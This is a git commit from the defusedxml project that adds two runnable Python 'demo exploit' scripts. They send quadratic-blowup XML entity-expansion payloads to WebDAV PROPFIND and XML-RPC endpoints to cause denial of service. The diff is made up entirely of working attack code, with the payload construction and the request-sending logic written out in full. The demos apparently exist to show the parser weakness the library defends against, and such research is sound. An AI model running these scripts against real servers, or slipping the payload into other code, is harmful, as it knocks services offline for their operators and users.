diff options
| author | Christian Heimes <christian@python.org> | 2013-02-25 00:48:53 +0100 |
|---|---|---|
| committer | Christian Heimes <christian@python.org> | 2013-02-25 00:48:53 +0100 |
| commit | 2d313278fbf41bc8758611efe0a4ef047e87c3be (patch) | |
| tree | 392d58fa980dbd53ad76fd01b85c7fd382336a96 | |
| parent | 3c27267f6ea6f64a97283ac34da803378643e58b (diff) | |
| download | defusedxml-git-2d313278fbf41bc8758611efe0a4ef047e87c3be.tar.gz | |
add demo exploits for webdav and xmlrpc
| -rwxr-xr-x | other/exploit_webdav.py | 44 | ||||
| -rwxr-xr-x | other/exploit_xmlrpc.py | 40 |
2 files changed, 84 insertions, 0 deletions
diff --git a/other/exploit_webdav.py b/other/exploit_webdav.py new file mode 100755 index 0000000..3288c28 --- /dev/null +++ b/other/exploit_webdav.py @@ -0,0 +1,44 @@ +#!/usr/bin/python +"""Demo exploit for WebDAV DoS attack + +Author: Christian Heimes +""" +import sys +import base64 +import urlparse +import httplib + +if len(sys.argv) != 2: + sys.exit("{} http://user:password@host:port/".format(sys.argv[0])) + +url = urlparse.urlparse(sys.argv[1]) + +xml = """<?xml version='1.0'?> +<!DOCTYPE bomb [ +<!ENTITY a "VALUE"> +]> + <propfind xmlns="DAV:"> + <prop>QUAD + <supported-live-property-set/> + <supported-method-set/> + </prop> +</propfind> +""" + +xml = xml.replace("VALUE", "a" * 30000) +xml = xml.replace("QUAD", "&a;" * 1000) + +headers = { + "Content-Type": "text/xml", + "Content-Length": len(xml), + "Depth": 1, + } + +if url.username: + auth = base64.b64encode(":".join((url.username, url.password))) + headers["Authorization"] = "Basic %s" % auth + +con = httplib.HTTPConnection(url.hostname, int(url.port)) +con.request("PROPFIND", url.path, body=xml, headers=headers) +res = con.getresponse() +print(res.read()) diff --git a/other/exploit_xmlrpc.py b/other/exploit_xmlrpc.py new file mode 100755 index 0000000..da8e8d0 --- /dev/null +++ b/other/exploit_xmlrpc.py @@ -0,0 +1,40 @@ +#!/usr/bin/python +"""Demo exploit for XML-RPC DoS attack + +Author: Christian Heimes +""" +import sys +import urllib2 + +if len(sys.argv) != 2: + sys.exit("{} url".format(sys.argv[0])) + +url = sys.argv[1] + +xml = """<?xml version='1.0'?> +<!DOCTYPE bomb [ +<!ENTITY a "VALUE"> +]> +<methodCall> +<methodName>system.methodSignature</methodName> +<params> +<param> +<value><string>QUAD</string></value> +</param> +</params> +</methodCall> +""" + +xml = xml.replace("VALUE", "a" * 100000) +xml = xml.replace("QUAD", "&a;" * 1000) + +headers = {"Content-Type": "text/xml", "Content-Length": len(xml)} + +req = urllib2.Request(url, data=xml, headers=headers) + +print("Sending request to {}".format(url)) + +resp = urllib2.urlopen(req) + +print("Response") +print(resp.read()) |